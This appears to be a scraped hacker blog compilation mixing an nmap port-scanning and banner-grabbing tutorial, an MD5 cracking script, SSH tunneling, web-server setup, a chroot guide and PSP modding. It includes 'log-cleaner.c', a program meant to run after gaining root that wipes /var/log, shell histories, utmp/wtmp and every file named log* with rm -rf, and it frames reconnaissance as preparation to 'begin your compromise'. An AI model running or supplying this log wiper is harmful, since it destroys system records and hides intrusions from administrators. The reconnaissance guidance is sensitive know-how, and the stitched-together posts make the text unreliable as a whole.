-sT TCP connect() scan: This is the most basic form of
TCP scanning. Establishes a full TCP connection with each port.
Considered to be a "noisy" scan because it leaves a lot of evidence
in the logs.

$ nmap -sT target.com (Active Attack)

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on target.com (127.0.0.2):
Port State Protocol Service
1 open tcp tcpmux
11 open tcp systat
15 open tcp netstat
22 open tcp ssh
25 open tcp smtp
79 open tcp finger
80 open tcp http
110 open tcp pop-3
113 open tcp auth
119 open tcp nntp
143 open tcp imap2
443 open tcp https
515 open tcp printer
540 open tcp uucp
2000 open tcp callbook
6667 open tcp irc
12345 open tcp NetBus

Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds

-The output that we receive from the TCP scan is very interesting yet, will be very noisey in the logs. Any clued admin
will see this as an attempt to gather information for a future attempt at compromise. Seeing that we are doing an assessment,
this method will suffice and does a wonderful job at identifying open ports. We also receive a confirmation that Nmap has
completed its run along with how many IP address's it scanned and how fast it scanned them. Before we continue on to the other
features of Nmap lets assess this situation and make some sense of what we have here as far as data is concerned. There are
several services that could be vulnerable to outside attack but, it is up to you to determine which services are vulnerable
and how to compromise each particular service. Lets take smtp (port 25) for instance, we need to determine what mail service
this target host is running and which version of that particular package they are running. To do this, simply telnet to that
port and read its header using the following command [telnet [target host] [port]]:

$ telnet www.target.com 25 (Active Attack)

220 target.com ESMTP Sendmail 9.1.12a/9.1.12a/punk-beta; Tue, 10 Aug 1999 08:44:03 -0700

-As you can see here this admin was clever enough to 'spoof' the version of Sendmail he is running. He did this by editing
the config file for Sendmail which (when done properly) can hide the version number which is a key element for attacking this
particular service for many versions of Sendmail are exploitable remotely to gain root access. Again, remember to make note
of each header and its respected data for they are valuble parts that make up this entire 'puzzle'. While we are on the
smtp service try out the help command by simply typing 'help'.

help

214-This is Sendmail version 9.1.12a
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP ".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info

-You can now try different commands listed in the topics area. Try [HELP [topic]] to see further help on a particular topic.
For an exercise, try doing a 'verify' (VRFY) on one of the users on the system, try root. We will let you figure the command out
on your own so that you get into the 'learn it on your own' frame of mind. Remember, when you are trying these exercises out
please do them on your own system or have the permission of the owner before you try any of these commands out.

-Now that we have gone over a brief description of the TCP scan lets move on to a more 'stealthy' way of scanning a remote
host.

-sS TCP SYN scan: This technique is often referred to
as "half-open" scanning, because you don't open a
full TCP connection.

1. Sends SYN packet as if establishing a 3-way handshake
2. Waits for SYN/ACK from destination
If SYN/ACK is received then the port is open
If RST (reset) is received then the port is closed
3. Rather than send ACK to establish connection, immediatley RST (reset) to
close connection.

$ nmap -sS www.target.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on target.com (127.0.0.2):
Port State Protocol Service
1 open tcp tcpmux
11 open tcp systat
15 open tcp netstat
22 open tcp ssh
25 open tcp smtp
79 open tcp finger
80 open tcp http
110 open tcp pop-3
113 open tcp auth
119 open tcp nntp
143 open tcp imap2
443 open tcp https
515 open tcp printer
540 open tcp uucp
2000 open tcp callbook
6667 open tcp irc
12345 open tcp NetBus

Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds

-Here we have the same ports open as before but, this time the identity of the account scanning this host is not given away.
The reason this happens is because we never establish a full connection or 'Three-way handshake'. As soon as the SYN/ACK
is received from the destination, rather than send an ACK to establish a connection we immediatley send a RST or 'reset' to
close the connection therefore, the identity is never known (this is assuming that the target host is not running any
extended logging features).

-Now we have a pretty good understanding of what services are running on this particular target host. Now, lets take a look
at OS detection and the concepts of OS Fingerprinting. There is a great paper on OS Fingerprinting by Fyodor at
http://www.insecure.org/nmap/nmap-fingerprinting-article.html. In this example we will show you how to use Nmap
to detect the OS of our remote target.

-O This option activates remote host identification
via TCP/IP fingerprinting.
1) Takes advantage of nuances found in each OS's TCP/IP stack to determine what OS
that remote host is running.
2) Sends specifically crafted packets to a host.
3) This information is used to generate a "fingerprint" which is then used to match
from a database of known OS fingerprints.

$ nmap -O www.target.com

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on localhost (127.0.0.1):
Port State Protocol Service
1 open tcp tcpmux
11 open tcp systat
15 open tcp netstat
21 open tcp ftp
22 open tcp ssh
25 open tcp smtp
79 open tcp finger
80 open tcp http
110 open tcp pop-3
113 open tcp auth
119 open tcp nntp
143 open tcp imap2
443 open tcp https
515 open tcp printer
540 open tcp uucp
2000 open tcp callbook
6667 open tcp irc
12345 open tcp NetBus

TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.32-34

Nmap run completed -- 1 IP address (1 host up) scanned in 15 seconds

-The output of data that we see here are the same services as the previous examples except that we now know the OS of
the remote target. This target is running Linux 2.0.32-34 and the TCP Sequence Prediction for Trusted Relationship
Exploitation or any other HiJacking method is truly random and would be VERY difficult to predict the sequence. Now if
we must use a script to compromise we now know what operating system we are looking at.

-The final two scans we will discuss briefly are Ping Scanning and UDP Scanning. TCP Ping Scanning is used to determine
which hosts are up on a network. UDP scanning is a method used to determine which UDP (User Datagram Protocol, RFC 768) ports
are open on a host. UDP scanning takes longer due to RFC 1812 section 4.3.2.8 and its limiting the ICMP error message rate.

-PT Use TCP "ping" to determine what hosts are up.
Instead of sending ICMP echo request packets and
waiting for a response, we send out TCP ACK packets
throughout the target network (or to a single
machine) and then wait for responses to return
Hosts that are up should respond with a RST.
* To set the destination port:
-PT
* The default port is 80

-sU UDP scans: This method is used to determine which
UDP (User Datagram Protocol, RFC 768) ports are
open on a host. Sends a 0 byte UDP packet to each port on the
target machine. If we receive an ICMP port unreachable message, then
the port is closed.
Some services that may be found with UDP scanning:
*BO cDc's backdoor program that hides on a configurable UDP port on Win machines
*snmp
*tftp
*NFS
*and others...

-We won't be showing output from these scans. Rather, we ask you to perform the above flags
as an exercise for yourself. Now that you have completed this basic auditing paper you should
take all the information learned here and apply it to one conclusive paper and then begin your
compromise.

CONCLUSION:

In conclusion, we have discussed the basics to auditing a remote host or target host.
Knowing the security of your own network is key to being able to defend your network from
malicious intent. The techniques described here are basic techniques used to gather information
on the remote target before compromise. Look for further papers from the ATTRITION staff on
Penetration and Auditing of systems.

GENERAL INFORMATION:

ATTRITION Security: http://www.attrition.org/security/newbie
Nmap Security Scanner: http://www.insecure.org/nmap
Whitepapers & Publications: http://www.enteract.com/~lspitz/pubs.html
Security Focus: http://www.securityfocus.com/
Packet Factory (Firewalk): http://www.packetfactory.net/

CONTRIBUTIONS:

Email all Contributions/Suggestions/Feedback to modify@attrition.org

ACKNOWLEDGMENTS:

The following individuals helped in either review, technical input, or in some other fashion.

Brian Martin, Dale Coddington, Jay D. Dyson, and Jeremy Rauch

modify@attrition.org
(c) copyright 1998, 1999 Karl Lynn

reference : http://www.unixgeeks.org/security/newbie/pen/ssarh.html

Hack a Mobile Phone with Linux and Python

2011-05-01T05:04:00.000-07:00

Managed to breath life back into my old hand-me-down Nokia N70. The phone was having White Screen of Death (WSOD) one too many, a new display IC fixed that. The original nokia battery (Nokia BL-5C) started to swell and needed to be replace.

Now the old war horse is battle ready, let me hook it up to my laptop via a bluetooth link and do something useful with Python on S60 series.
$ hciconfig reset hci0:

Type: USB

BD Address: 00:21:86:A8:BF:03

ACL MTU: 310:10

SCO MTU: 64:8

UP RUNNING PSCAN ISCAN

RX bytes:1260 acl:0 sco:0 events:34 errors:0

$ hcitool dev

Devices: hci0 00:21:86:A8:BF:03

$ sdptool add --channel=2 SP

Serial Port service registered

# Now make sure the Python bluetooth console is running

$ rfcomm listen rfcomm2 2 In your phone,

make sure bluetooth is on,

then go to the Python application and then select the Bluetooth Console.

Select from the list of available devices your computer's bluetooth adapter (you might need to select search even if you think you have already defined the pairing).

If the operation is successful, you should see something similar to the following on your computer's shell:

* Waiting for connection on channel 2
* Connection from 00:11:9F:BE:47:CA to /dev/rfcomm2
* Press CTRL-C for hangup

# Change to different terminal and connect to the device with screen.

$ screen /dev/rfcomm2

# Run basic tests.
print u"hello"

hello

>>>

>>>

import appuifw >>>

appuifw.note(u"hello world")

>>>

This Python S60 Bluetooth Console wiki page provides more step by step intrusions of the whole process.

reference : http://famehack.wordpress.com/2011/02/20/hack-a-mobile-phone-with-linux-and-python/

hashchecker.py

2011-03-29T05:33:00.000-07:00

well. too long im not update my blog. now i will update again with my tool, my tool called with

hashcheker.py

this tool for cheking md5 from web hashchecker.de.

this my c0de:

#!/usr/bin/python
#This tool just for crack your md5 password
#This application not stable in regex
#
#programmer : kiddies A.k.A peneter
#email : kecoak2004@yahoo.com
#blog : http://devilz-kiddies.blogspot.com
#
#thanks : mywisdom, gunslinger, jimmyromanticdevil, 5ynl0rd(my masta) and you
#community : devilzc0de, anti-jasakom, jasakom, echo, codecall, leetcoder and all
#special thanks for you honey vera. love you

import urllib2, urllib, re, time
import sys, os

if sys.platform == 'linux-1386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
else:
SysCls = 'cls'

os.system(SysCls)
print '''
######################################################################
# DDDDD iii lll 00000 dd #
# DD DD eee vv vv lll zzzzz cccc 00 00 dd eee #
# DD DD ee e vv vv iii lll zz cc 00 00 dddddd ee e #
# DD DD eeeee vvv iii lll zz cc 00 00 dd dd eeeee #
# DDDDDD eeeee v iii lll zzzzz ccccc 00000 dddddd eeeee #
# #
# #
# This Tool for cracking MD5 password #
# Programmer : kiddies A.k.A peneter Devilzc0de BlackHat Edition #
######################################################################\n\n'''
hash_crack = raw_input('input your hash : ')
url = 'http://hashchecker.de/hash.cgi?action=check&wert=1&hash=' + hash_crack
params = {'hash':hash_crack}
enc = urllib.urlencode(params)
opening = urllib2.urlopen(url, enc)

page = opening.read()

result = re.search(r'', page)

print result.group()

opening.close()

my tool have a bug in regex. if yopu can fix this problem please contact me in my email
movax30@hotmail.com. thanks

Twitter Console Version 0.1

2010-12-26T12:49:00.000-08:00

this software made by kiddies. this tool can be update status in twitter via console and look friends and waht they status..

this version 0.1 twitter console.

your comment and critical can be sent to my email or give comment here
your comment will be make this tool perfectly

source:

#!/usr/bin/python

#This tool just for fun
#thanks : mywisdom, gunslinger_, flyff666, petimati, synlord(get your honey dude :p), jimmy, whitehat and you !
#special made : devilzc0de
#email : kecoak2004@yahoo.com
#blog : http://devilz-kiddies.blogsport.com and http://kiddiescode.wordpress.com
#forum thanks : devilzc0de, jasakom, antijasakom, void-labs, and all community
#special thanks: for my lovely(verawati), you always beside me when im sad, fall and happy

import twitter
import time

#twitter connect
print """
####################################################
#~|~ o_|__|_ _._ |~ _ ._ _ _ | _ /\ '| #
# | \/\/| | | }_| |_(_)| |_\(_)|}_ \/ \/o | #
# #
# twitter console version 0.1 #
# developed by kiddies A.k.A peneter #
####################################################
"""

user_name = raw_input("please insert your username or email : ")
pass_word = raw_input("please insert your password : ")
try:
connect = twitter.api(username = user_name, password = pass_word)
print "your twitter account was connected"
print "what do you wanna do ? "
print "[1]Update your wall"
print "[2]Look your frieds wall"
choose = raw_input("coose 1 or 2 : ")
if choose == "1":
wall = raw_input("input your wall message : ")
update = connect.PostUpdate(wall)
print "your twitter wall have been updated : %s " % wall
print "Thanks for using Twitter Console"
if choose == "2":
wall_look = connect.GetFriends()
for wall in wall_look:
look = wall.screen_name + wall.status.text
time.sleep(50)
print look
else:
print "[-]Back to Main Menu"

except ImportError:
print "Please check twitter module"
print "Please check your Connection"
print "Please check your username or password, may be those invalid"

Basic Linux security

2010-12-07T15:41:00.000-08:00

Computer security has become a critical subject in information technology system these days. If we looked back in history, the security threat has started a long time ago during 1970s when telephone system has been hacked. Many computer crimes happened and as a result, the Computer Fraud and Abuse Act has been made in 1980s. As technology advanced, the evolution of computer networking and the born of Internet, the threats to information and networks have risen significantly. The well-known harassment and destructive attacks are denial of service (DOS), mail bombs and list-linking, viruses, worms and Trojan horses.

Many efforts have been taken to improve computer security including the use of a network and security tools, control user access using permissions and passwords, data encryptions, and virus detectors. Other approaches to improve computer security involve secure operating systems, security architecture, security by design, secure coding and application.
Physical security

The purpose of security is to prevent unauthorized access into the system. This involves securing the physical and network access. Securing the physical access means to limit who can physically access your system, server room and workstations. It's been estimated that 80% of intrusions initiated by insiders. Securing physical access can be made by implementing a restricted area to the network operation centers and developing security policy controls.

Another way of securing the physical access into the system is to secure network hardware such as routers, bridges and switches from local users. Many network hardware have password issue which provide the means to perform onside password recovery. Several steps can be taken such as setting administrative and user password by overwrite the default password, enabled encryption, disable unwanted service such as telnet, and use security utility options if provided by the network hardware.

If your servers and security hardware are secured, intruder will look at other vulnerabilities which are workstation and user. Securing workstation can be made with BIOS and console passwords. For the users part, they must be given security knowledge such as never reveal their password to anyone else, never leave their computer unlock, and so on and alert them with security threats from time to time.
Linux network security

Securing the network access is securing access to the operating system remotely. One of the network security threat is malicious code, such as virus and Trojan which create a backdoor in your system. There are many file integrity checking software available for Linux. Some of them are Tripwire, TAMU, Aide and ATP.

Other network security attack is sniffers and network monitoring tools. Sniffers are very dangerous because they can capture sensitive data such as passwords and confidential information.

Scanners are also a high risk tool use by attacker to scan your system and network. To protect your network and system from scanner you can use a firewall and other tools such as IcmpInfo, scan-detector and klaxon.

Another way of attacking a network is spoofing attack. There are TCP and IP spoofing, ARP spoofing and DNS spoofing.

reference:http://www.basicconfig.com/linuxsecurity

Tunnel Everything through SSH

2010-10-22T05:59:00.000-07:00

n this Tutorial I'll cover how you can tunnel any TCP traffic through an encrypted SSH connection or a SOCKS server, even if a certain program doesn't support proxying of connections natively.

The only requirement for SSH tunneling to work is a shell account on a machine connected to the internet (and, optionally, a HTTP Proxy server). I will refer to this account as your server (it doesn't matter if you may not become root).
Tunneling HTTP

In case you just want to tunnel HTTP traffic (to surf safely, to let the request appear to originate from a different IP and/or to not disclose HTTP clear text passwords to your LAN) best practise is to set up Privoxy on your server. By default, Privoxy binds to 127.0.0.1:8118 (thus only allowing connections from localhost), which is good for us. No configuration must be done for this.

The next step is to establish a tunnel from your computer to your server's Privoxy. That is done with the following SSH command:

ssh -NL 8118:localhost:8118 user@server

This command opens a tunnel on your computer: All connections to port 8118 will be forwarded (encrypted, of course) over the SSH connection and come out at your server's port 8118 (where Privoxy is running).

Once you have established the connection you will want to edit your browser's proxy settings accordingly. Just set the HTTP (and, with some browsers, the HTTPS) proxy to localhost, port 8118.
Advantages

The great advantage over SOCKS tunneling (see below) is, that even the DNS requests are made from your server. No-one on your LAN can gather information on what kind of site you're surfing. Another advantage is that Privoxy already filters out some advertisements and removes sensitive headers from your requests.
Tunneling Arbitrary Protocols (Dynamic Forward/SOCKS)

If you want to tunnel not just HTTP traffic but arbitrary other TCP protocols as well, a HTTP Proxy isn't adequate any more. Instead, you'll have to set up a SOCKS proxy. That also is possible with SSH:
Setting up the SSH proxy

Setting up the SSH SOCKS proxy is really easy. On your computer, just enter the following command:

ssh -ND 3333 user@server

That command establishes a connection to your server, logs in as user user (you'll have to enter your password though, of course) and then starts a little SOCKS proxy on your server.

On your computer, all connections to port 3333 will be forwarded over the secure SSH channel and will then be forwarded by the proxy to their destination.

Now you'll have to configure the program you want to connect through that tunnel to use localhost, port 3333 as it's SOCKS server (if you have the choice, select SOCKS version 5).

Not many programs support SOCKS proxy forwarding natively (hardly any CLI programs). But there is a workaround for that: tsocks. It enables arbitrary programs which don't support the SOCKS protocol natively to establish connections via a SOCKS server.
How tsocks works

On your computer, install the tsocks program.

I won't go into detail about how this program works, but it basically does the following:

* Before the actual program is loaded tsocks loads its own shared library.
* This library overwrites the kernel's connect() function and replaces it with its own.
* Whenever the program tries to send a request the request is forwarded through your proxy server (and then over the secure tunnel).

All this is done through setting the environment variable LD_PRELOAD to /usr/lib/libtsocks.so.

The tsocks program itself is just a simple shell wrapper script. All the actual redirecting stuff is done via the library.
Editing the /etc/tsocks.conf

Now you'll have to edit the file /etc/tsocks.conf to relay all connections through your proxy. Open the file and delete all lines. Then enter just the following two lines:

server = 127.0.0.1
server_port = 3333

If you may not become root ...

... just enter the two lines from above into a file called .tsocks.conf and place it in your home directory. Then, write a little shell script:

#!/bin/sh

TSOCKS_CONF_FILE=$HOME/.tsocks.conf
export TSOCKS_CONF_FILE
exec tsocks "$@"

I call this script viaservername. Place this script in a directory contained in your $PATH and make it executable.
Tunneling Connections

For programs who natively support proxying connections (e.g. Mozilla Firefox) you can now set the proxy address to localhost port 3333. I don't recommend to do that for browsers; instead, use HTTP tunneling (see above).

All other programs which's connections you want to tunnel through your server are prefixed with tsocks. This would look like some of the following program calls (if you wrote a shell script, use that instead of tsocks):

tsocks dog http://www.google.com
tsocks netcat example.com 80
tsocks irssi -c irc.freenode.net -p 6667

If you call tsocks without parameters it executes a shell witht the LD_PRELOAD environment variable already set and exported. That means that every program called from this shell will be redirected through the external server and every subsehll started from this shell will also have the LD_PRELOAD variable set. So if you started tsocks directly after logging in all your traffic would be redirected through your external server.
Example

$ cat =myip
#!/bin/sh
lynx -dump http://tnx.nl/ip

$ ssh -fND 3333 xxx@feh # -f: goes to background after prompting for password
xxx@feh.name's password:

$ IP=`myip`; host $IP
Name: p54XXXX8B.dip.t-dialin.net
Address: 84.143.XXX.XXX

$ IP=`tsocks myip`; host $IP
16:15:23 libtsocks(26802): Call to connect received on completed request 3
Name: feh.name
Address: 217.160.108.109

Have fun!

reference: http://www.plenz.com/tunnel-everything

Making your Home Computer / Dedicated Computer your own Web Server!!!

2010-10-18T02:13:00.000-07:00

In this tutorial we will learn how to make your personal web server from a Home Computer or a Dedicated Computer using Windows 2000, Windows XP and Windows 2003. In the end we will have asp and php extensions installed. Also have a very commonly used program called mysql (Database Management) Lets get started!

1. Installing Internet Information Services (IIS)
Note: Have your Windows XP or Windows 2000 CD Inside the CD-Rom Drive. That way it just installs the software with out asking you to place it in.

Start > Settings > Control Panel > Add & Remove Programs
A window is going to pop-up, on the left hand side a button titled "Add/Remove Windows Components"
Another window should pop-up and look something like this:

Next to Application Server (Windows 2003) or Internet Information Services ( Windows XP)
Click so the check mark is showing. (Advanced Installation) Click on detail and select any other software you might want to use later on.
Now click Next and the installation should start.
Once IIS is installed on your machine you can view your home page in a web browser by typing http://localhost
You can also change localhost for the name of your computer or if a dedicated computer use IP address into the address bar of your web browser.

Note: Your default web directory to place your web site in is CInetpub\wwwroot (Place your website files there)

2. Installing PHP & Configuring
Note: Find the latest PHP-Installer at http://www.php.net/downloads I used PHP 5.0.3 installer [2,267Kb]
Note: First check what IIS# you have installed by going: Start > Settings > Administrative Tools > Internet Information Services (IIS) Manager

On the top right under "Version" Remember that! you will need it when installing php!

Now run the executable installer a pop-up window should come up:

Note: Windows 2003 IIS6, Windows XP IIS5.1, Windows 2000 Unknown
Browse to your desired directory ( I suggest keeping it default for the sake of this tutorial) > Next > Select IIS# > Next
The installation wizard gathers enough information to set up the php.ini file, and configure certain web servers to use PHP.
Once the installation has completed, the installer will inform you if you need to restart your system, restart the server, or just start using PHP.
Note: This istaller configures your Internet Information Services (IIS)

Make a php page "phpinfo.php" and dump this code inside:

// Show all information, defaults to INFO_ALL
phpinfo();

// Show just the module information.
// phpinfo(8) yields identical results.
phpinfo(INFO_MODULES);

?>

Save it to: CInetpub\wwwroot open browser to: http://localhost/phpinfo.php
PHP IS INSTALLED!

3. Download the latest Mysql Server install from: http://dev.mysql.com/downloads/ in my case I downloaded the Recommended version "MySQL 4.1 -- Generally Available (GA) release (recommended)"

Now run the exe and you should get a pop-up window similar to this:

Click Next > Next >
Now there's a section where it ask you to make a mysql.com account select third one down "Skip Sign-Up"
Click Finish! Now the Configuration Wizard should pop-up Click Next > Detailed Configuration
Now you should be here:

If your running it on your own pc "Select Developer Machine" If on a dedicated server chose "Dedicated MySQL Server Machine"
Click Next > Next > Next
Mysql Server Instance Configuration Section! If your going to run your test site on this chose "Manual Settings and put 10" for a couple of users "Decission Support" If a Dedicated server "Online Transaction Processing" Click Next
Next > Next > Should be here:

Make sure you select "Include Bin Dirrectory in Windows PATH" Click Next!
Now type in your Root Password. Now click Next and Execute.

If you want to go the mile dump something like phpmyadmin in your CInetpub\wwwroot for easy access of your databases.
Note: That's something we wont get into in this tutorial!

Done!

reference:http://www.youngcoders.com/

Create a Live Windows CD

2010-10-18T02:12:00.000-07:00

Take a look at http://www.lachiesadicristo.it/w98cd/default.htm.

It guides you how to create a live, bootable CD with Windows on. Once the CD is created, you can use it on any PC (with enough RAM) to run Windows, without even touching the hard drive.

It's easy to do if you know Windows well. I have once of these CD's I made with tools to fix up my PC if it was to ever develop a problem. Very useful indeed.

It's recommended you use Windows 98, but if you have a powerful PC with more than 512MB RAM, you could use Windows Me easily.

Just take note that some of the tools listed in the tutorial have now disappeared from the net, making them hard to find. I will post links to the missing tools when I track them down or upload them to my site.

log-cleaner.c

2010-09-12T00:01:00.000-07:00

[begin]
/*simple code deleting logs from linux please use it after you enter the root access
c0d3r : kiddies A.k.A peneter
email : kecoak2004[at]yahoo[dot]com
visit : http://devilz-kiddies.blogspot.com/
http://kiddiescode.wordpress.com/
inspirate :mywisdom
greetz:mywisdom,gunslinger_,xtr0nic,whitehat,flyff666,petimati
isa muhammad said,patriot,cruz3n,n4p5t3r(Founder of anti social community)and you...

greetz:devilzc0de crews n members, ycl,jasakom,anti-jasakom,kecoak-elektronik
anti-social(my private community),leetcoder,voidnetwork,codecall, darkc0de (missing forum n real blackhat forum) n soon..

special thanks:vera you always be mine and otherhand..thanks you always beside me
when im happy,sad and down..love you honey*/

#include
int main()
{
system("rm -rf /tmp/logs");
system("rm -rf $HISTFILE");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_history");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_logout");
system("rm -rf /usr/local/apache/logs");
system("rm -rf /usr/local/apache/log");
system("rm -rf /var/apache/logs");
system("rm -rf /var/apache/log");
system("rm -rf /var/run/utmp");
system("rm -rf /var/logs");
system("rm -rf /var/log");
system("rm -rf /var/adm");
system("rm -rf /etc/wtmp");
system("rm -rf /etc/utmp");
system("find / -name *.bash_history -exec rm -rf {}");
system("find / -name *.bash_logout -exec rm -rf {}");
system("find / -name "log*" -exec rm -rf {}");
system("find / -name *.log -exec rm -rf {}");
}
[EOF]

chroot shell tutorial

2010-08-23T10:50:00.000-07:00

let's say you want a user of your (linux) server to have no access to anything you don't want him/her to use..
but you do want them to be able to log in and do their thing...
you'll need to root jail (chroot) the user.
there are lots of tutorials about chroot and also chrooted shells, but I couldn't find a good one, so I wrote one down while working my way thrue the othere tutorials and howto's..
hope you like it !!

disclaimer:
reading and following any or all steps in this tutorial is at your own risk.
I am not responsible for your stupidity !

his tutorial should work on all linux distributions, but i've only tested it on slackware (9.0, 9.1, 10, 10.1 and 10.2)

you'll need the following programs (wich are possibly not installed):

/usr/bin/sudo
/usr/sbin/chroot

If you can't seem to find or install these, this tutorial is not for you !!

all thrue the tutorial you'll see bold italic lines.. they are supposed to be executed by you
whoami
if that didn't say root. you'll need to become root.
su

in this example the user "luser" will be added and jailed ..
you'll need to be super user (root) to do all this..

let's start by adding the user:
useradd -d /tmp -s /bin/chrootshell luser
this adds the user luser with home folder /tmp with shell
/bin/chrootshell

now set his password:
passwd luser

make his home dir:
mkdir /home/luser

now we need to make his shell..
use your favorite editor to paste the following in /bin/chrootshell

#!/bin/bash

# chrootshell spawns chroot shell
#
# (c) 2003-2005 Anne Jan Brouwer
# GNU GPL

if [ "$1" = "-c" ]
then
i=0
PARAMETERS=""
for parameter in $*
do
if [ $i -gt 0 ]
then
PARAMETERS="$PARAMETERS $parameter"
fi
let i++
done
sudo /usr/sbin/chroot /home/$USER /bin/su - $USER -c "$PARAMETERS"
else
sudo /usr/sbin/chroot /home/$USER /bin/su - $USER
fi

make the "chrootshell" executable..
chmod +x /bin/chrootshell

now, let's go and make the chroot root ;)
we go to the users home dir, wich will become his root
cd /home/luser
note: we will be staying in for the rest of this tut !!!

make the most important folders..
mkdir bin dev etc home lib tmp usr

make the users chrooted home dir
mkdir home/luser
chown luser:users home/luser

make the chrooted tmp dir usable
chmod 777 tmp
chmod +t tmp

let's make the chrooted passwd file
grep root /etc/passwd >> etc/passwd
now we'll need to edit the passwd file to change the lusers chrooted shell and path..
fire up your favorite editor to edit the newly created passwd file.
the line should look a little like this:
luser: x:1020:100::/tmp:/bin/chrootshell
change it to:
luser: x:1020:100::/home/luser:/bin/bash
not that 1020 is the users ID and is propably some other number on your
puter.. don't change it to 1020 just because it said 1020 in my example ok ;)

now we'll make the chrooted group file
grep root /etc/group >> etc/group
grep users /etc/group >> etc/group

we'll copy the standard /etc/profile and needed files you could chose to edit these
cp /etc/profile etc
cp /etc/DIR_COLORS etc
cp /etc/HOSTNAME etc

we'll need to make some much needed devices
mknod -m 0666 dev/tty c 5 0
mknod -m 0644 dev/urandom c 1 9
mknod -m 0666 dev/null c 1 3

let's now make some usefull (compatibility) links and folders..
ln -s bin usr
ln -s lib usr
ln -s lib usr/libexec
mkdir usr/local
ln -s bin usr/local
ln -s lib usr/local
and make the terminfo (needed for a lot of programs) available in the root jail.
mkdir usr/share
cp -r /usr/share/terminfo usr/share

now for the realy fun part...
you'll have to find out some stuff:

1. what do you want the user to be able to use
2. what library's do these executables need
3. what other files will the user be needing

1. what do you want the user to be able to use

the user will need a shell (bash)
the user will need su (because the chrootshell script depends on it)
the user will need basic tools (cp, cat, ls, rm, mv etc.).
you'd want the user to have some other tools (vi, pico, whoami etc..)
you'd like for the user to have dircolors and id (needed if you want to use the standard etc/profile)

copy these files to the users chrooted bin dir
cp `which bash` `which su` `which cp` `which ln` `which ls` `which rm` `which mv` `which cp` `which du` `which cat` `which less` `which vi` `which pico` `which whoami` `which dircolors` `which id` bin
note: the `which bash` part returns the full path of bash (/bin/bash) etc..

2. what library's do these executables need

the command ldd is realy usefull here..
let's take bash for example:
root@server~# ldd `which bash`
libtermcap.so.2 => /lib/libtermcap.so.2 (0x4001b000)
libdl.so.2 => /lib/libdl.so.2 (0x40020000)
libc.so.6 => /lib/libc.so.6 (0x40023000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

and copy all the needed libs for each of the programs you chose in step 1 to the chrooted lib dir..

let's first do so for bash
cp /lib/libtermcap.so.2 /lib/libdl.so.2 /lib/libc.so.6 /lib/ld-linux.so.2 lib
next the one (on my system) missing for su
cp /lib/libcrypt.so.1 /lib/libnss_compat.so.2 /lib/libnss_files.so.2 lib
note that ldd doesn't see that libnss is needed, it is!!
next the ones for ls (only the ones not allready copied ofcourse ;))
cp /lib/librt.so.1 /lib/libpthread.so.0 lib
etc...
cp /lib/libncurses.so.5 lib
cp /lib/libresolv.so.2 lib

3. what other files will the user be needing

well this depends on what kind of programs the user is allowed to execute..
there's no real telling what you'll have to give the user to be content..
wait a minute !! the user has to be content with what you give him/her !!

the last step is to add the user to the sudoers file..
open the /etc/sudoers file with your favorite editor or use
visudo
add the line:
luser ALL= NOPASSWD: /usr/sbin/chroot /home/luser /bin/su - luser*
save and exit

now to check it out.. try and log in as the newly created luser
ssh -l luser localhost

A lot more info on chroot logins

A nice derived paper can be found at rootshellsecurity.com

Another system I'm gonna have to check out is jailkit..

Copyright (c) 2003-2005 by Anne Jan Brouwer (the_JinX).
This work is licensed under a Creative Commons License.
Attribution-ShareAlike 2.0 or later

reference:http://intmainvoid.nl/

Trinity Rescue Kit 3.4 released

2010-08-17T03:35:00.000-07:00

After more than a year of development, developer Tom Kerremans has announced the release of version 3.4 of the Trinity Rescue Kit (TRK). TRK is a Live distribution – bootable via a LiveCD, LiveUSB or over a network – that's based on Mandriva Linux and is specifically aimed at recovery and repair operations for both Windows and Linux systems. For example, it includes a number of tools for recovering deleted files, resetting passwords and cloning drives.
Trinity Rescue Kit 3.4 uses the latest 2.6.35 Linux kernel and features an updated, easy to use scrollable text menu that provides access to its most commonly used features. Using the NTFS-3G read/write driver, TRK includes full NTFS file system write support. Other features include an application for removing various temporary files from a system, full proxy server support and several updates to the included packages. Five anti-virus programs with online update capabilities are included, integrated into a single uniform command-line, as well as two rootkit detection utilities.
More details about the release can be found in the official release announcement and in the change log. Trinity Rescue Kit 3.4 build 367 is available to download as a 146MB LiveCD from the project's site and online documentation is provided.

reference: http://www.h-online.com/open/news/item/Trinity-Rescue-Kit-3-4-released-1059476.html

PSP Hacking (Softmodding your battery)

2010-08-07T17:09:00.000-07:00

This was the tutorial i used when i was first getting into PSP hacking. I did not write this myself, it came origionally from a man named Ben Heck which can found at Ben Heck's Official Site. Most tutorials tell you that you need a second PSP with a custom firmware installed (homebrew) to create a pandora battery and magic memory stick for the PSP that you which to Unbrick. If you dont have access to a second unbricked PSP then this tutorial will help you out like it did for me. I would write this tutorial myself, but most all of the information i have on this method i aquired from this tutorial anyways, so it only makes sence to share the origional.

We will still start off with Q/A (Questions/Answers)

Q)What is Pandora's Battery?
A)Pandora's Battery is a utility that utilizes your memory stick and battery to hack your psp.

Q)There are already a lot of tutorials for this.....what makes yours any different?
A)On most of the tutorials it tells you that you require a psp that has 1.50 or a custom firmware. My tutorial doesnt require the use of a second psp! Just some spare time and a little skill.

Q)Is Pandora's Battery illegal?
A)Pandora's Battery is in no way illegal because it doesnt use any copy written material (rather it be from Sony or a 3rd party application)

Q)What is "Hardmodding"?
A)Hardmodding is a way or modifying something through hardware. (example: modifying a battery)

Q)Why did you update this post?
A)As listed above, i always receive mail because people don't understand some of the processes. So hopefully this newer version will sum things up and make it clearer.

Q)I Cant afford a new battery what can i do?
A)Read the "DA Time Machine section"

Q)Where have you been?
